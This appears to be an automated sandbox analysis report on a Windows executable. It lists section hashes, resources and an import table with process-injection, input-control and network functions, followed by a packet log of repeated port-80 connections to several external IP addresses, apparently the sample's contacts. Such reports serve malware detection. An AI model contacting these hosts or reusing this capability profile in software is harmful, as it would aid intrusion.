                                                                                              • [ASM] VS2008 SP1 build 30729
                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                              • [C++] VS2008 SP1 build 30729
                                                                                              • [ C ] VS2005 build 50727
                                                                                              • [IMP] VS2005 build 50727
                                                                                              • [ASM] VS2008 build 21022
                                                                                              • [RES] VS2008 build 21022
                                                                                              • [LNK] VS2008 SP1 build 30729
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                              RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                              RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                              RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                              RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                              RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                              RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                              RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                              RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                              RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                              RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                              RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                              DLLImport
                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                              USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                              GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                              OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishGreat Britain
                                                                                              EnglishUnited States
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 8, 2024 05:28:06.160811901 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:06.165692091 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:06.165777922 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:06.172959089 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:06.177930117 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:07.032301903 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:07.032346964 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:07.032463074 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:07.032596111 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:07.032596111 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:07.035321951 CEST4979380192.168.2.4103.106.67.112
                                                                                              Oct 8, 2024 05:28:07.040096045 CEST8049793103.106.67.112192.168.2.4
                                                                                              Oct 8, 2024 05:28:22.114528894 CEST4988580192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:22.119453907 CEST8049885156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:22.119549036 CEST4988580192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:22.132260084 CEST4988580192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:22.137130022 CEST8049885156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:23.030595064 CEST8049885156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:23.030677080 CEST8049885156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:23.031443119 CEST4988580192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:23.644102097 CEST4988580192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:24.662096024 CEST4990280192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:24.667032957 CEST8049902156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:24.667160034 CEST4990280192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:24.675681114 CEST4990280192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:24.680504084 CEST8049902156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:25.573026896 CEST8049902156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:25.573080063 CEST8049902156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:25.573179960 CEST4990280192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:26.191009998 CEST4990280192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:27.208939075 CEST4991880192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:27.214246035 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.214363098 CEST4991880192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:27.223861933 CEST4991880192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:27.228883982 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.228915930 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.228971958 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.228998899 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.229024887 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.229073048 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.229099989 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.229125977 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:27.229151964 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:28.304574013 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:28.304687977 CEST8049918156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:28.304863930 CEST4991880192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:28.739943027 CEST4991880192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:29.764866114 CEST4993480192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:29.769757032 CEST8049934156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:29.769839048 CEST4993480192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:29.782639027 CEST4993480192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:29.787559986 CEST8049934156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:30.716857910 CEST8049934156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:30.717644930 CEST8049934156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:30.717732906 CEST4993480192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:30.720860958 CEST4993480192.168.2.4156.227.17.86
                                                                                              Oct 8, 2024 05:28:30.725697041 CEST8049934156.227.17.86192.168.2.4
                                                                                              Oct 8, 2024 05:28:35.993138075 CEST4997380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:35.998014927 CEST8049973208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:35.998100042 CEST4997380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:36.007236004 CEST4997380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:36.012509108 CEST8049973208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:36.541786909 CEST8049973208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:36.541898012 CEST4997380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:37.518774986 CEST4997380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:37.523778915 CEST8049973208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:38.536798000 CEST4998680192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:38.541748047 CEST8049986208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:38.541872025 CEST4998680192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:38.550568104 CEST4998680192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:38.555422068 CEST8049986208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:39.076586008 CEST8049986208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:39.076915026 CEST4998680192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:40.065721035 CEST4998680192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:40.070777893 CEST8049986208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.086507082 CEST5000480192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:41.290560961 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.290719032 CEST5000480192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:41.307555914 CEST5000480192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:41.313004971 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313049078 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313080072 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313107967 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313136101 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313163996 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313194036 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313227892 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.313256025 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.823151112 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:41.823271036 CEST5000480192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:42.815735102 CEST5000480192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:42.820650101 CEST8050004208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:43.833667994 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:43.838870049 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:43.838958979 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:43.845465899 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:43.850361109 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:44.731414080 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:44.731492043 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:44.731530905 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:44.731559038 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:44.731564999 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:44.731653929 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:44.743818998 CEST5001380192.168.2.4208.91.197.27
                                                                                              Oct 8, 2024 05:28:44.748689890 CEST8050013208.91.197.27192.168.2.4
                                                                                              Oct 8, 2024 05:28:49.794218063 CEST5001480192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:49.799547911 CEST805001434.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:49.799997091 CEST5001480192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:49.815325975 CEST5001480192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:49.820549965 CEST805001434.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:50.407948017 CEST805001434.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:50.408008099 CEST805001434.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:50.408385992 CEST5001480192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:51.331382990 CEST5001480192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:52.349468946 CEST5001580192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:52.355007887 CEST805001534.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:52.355350971 CEST5001580192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:52.365696907 CEST5001580192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:52.370923996 CEST805001534.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:52.977632046 CEST805001534.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:52.977689981 CEST805001534.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:52.977757931 CEST5001580192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:53.878349066 CEST5001580192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:54.898324013 CEST5001680192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:54.903501034 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.903608084 CEST5001680192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:54.920206070 CEST5001680192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:54.925338984 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925369978 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925396919 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925424099 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925451040 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925487041 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925587893 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925615072 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:54.925642014 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:55.506795883 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:55.506907940 CEST805001634.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:55.506988049 CEST5001680192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:56.427294016 CEST5001680192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:57.443155050 CEST5001780192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:57.448244095 CEST805001734.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:57.448338032 CEST5001780192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:57.454408884 CEST5001780192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:57.459326982 CEST805001734.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:58.080091000 CEST805001734.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:58.080149889 CEST805001734.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:28:58.080620050 CEST5001780192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:58.082736969 CEST5001780192.168.2.434.251.91.168
                                                                                              Oct 8, 2024 05:28:58.087753057 CEST805001734.251.91.168192.168.2.4
                                                                                              Oct 8, 2024 05:29:03.163470030 CEST5001880192.168.2.484.32.84.32
                                                                                              Oct 8, 2024 05:29:03.168443918 CEST805001884.32.84.32192.168.2.4
